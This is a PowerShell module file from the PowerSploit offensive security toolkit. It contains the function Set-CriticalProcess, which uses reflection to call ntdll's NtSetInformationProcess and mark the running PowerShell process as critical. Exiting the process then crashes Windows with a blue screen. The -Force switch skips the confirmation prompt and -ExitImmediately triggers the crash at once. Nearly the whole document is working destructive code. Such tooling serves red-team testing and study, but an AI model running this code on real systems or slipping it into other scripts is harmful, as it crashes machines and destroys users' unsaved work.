PowerSploit

1.0.0.0

Mayhem/Mayhem.psm1

                                function Set-CriticalProcess

{

<#

.SYNOPSIS

Causes your machine to blue screen upon exiting PowerShell.

PowerSploit Function: Set-CriticalProcess

Author: Matthew Graeber (@mattifestation)

License: BSD 3-Clause

Required Dependencies: None

Optional Dependencies: None

.PARAMETER ExitImmediately

Immediately exit PowerShell after successfully marking the process as critical.

.PARAMETER Force

Set the running PowerShell process as critical without asking for confirmation.

.EXAMPLE

Set-CriticalProcess

.EXAMPLE

Set-CriticalProcess -ExitImmediately

.EXAMPLE

Set-CriticalProcess -Force -Verbose

#>

    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param (

        [Switch]

        $Force,

        [Switch]

        $ExitImmediately

    )

    if (-not ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))

    {

        throw 'You must run Set-CriticalProcess from an elevated PowerShell prompt.'

    }

    $Response = $True

    if (!$Force)

    {

        $Response = $psCmdlet.ShouldContinue('Have you saved all your work?', 'The machine will blue screen when you exit PowerShell.')

    }

    if (!$Response)

    {

        return

    }

    $DynAssembly = New-Object System.Reflection.AssemblyName('BlueScreen')

    $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)

    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('BlueScreen', $False)

    # Define [ntdll]::NtQuerySystemInformation method

    $TypeBuilder = $ModuleBuilder.DefineType('BlueScreen.Win32.ntdll', 'Public, Class')

    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('NtSetInformationProcess',

                                                        'ntdll.dll',

                                                        ([Reflection.MethodAttributes] 'Public, Static'),

                                                        [Reflection.CallingConventions]::Standard,

                                                        [Int32],

                                                        [Type[]] @([IntPtr], [UInt32], [IntPtr].MakeByRefType(), [UInt32]),

                                                        [Runtime.InteropServices.CallingConvention]::Winapi,

                                                        [Runtime.InteropServices.CharSet]::Auto)

    $ntdll = $TypeBuilder.CreateType()

    $ProcHandle = [Diagnostics.Process]::GetCurrentProcess().Handle

    $ReturnPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(4)

    $ProcessBreakOnTermination = 29

    $SizeUInt32 = 4

    try

    {

        $null = $ntdll::NtSetInformationProcess($ProcHandle, $ProcessBreakOnTermination, [Ref] $ReturnPtr, $SizeUInt32)

    }

    catch

    {

        return

    }

    Write-Verbose 'PowerShell is now marked as a critical process and will blue screen the machine upon exiting the process.'

    if ($ExitImmediately)

    {

        Stop-Process -Id $PID

    }

}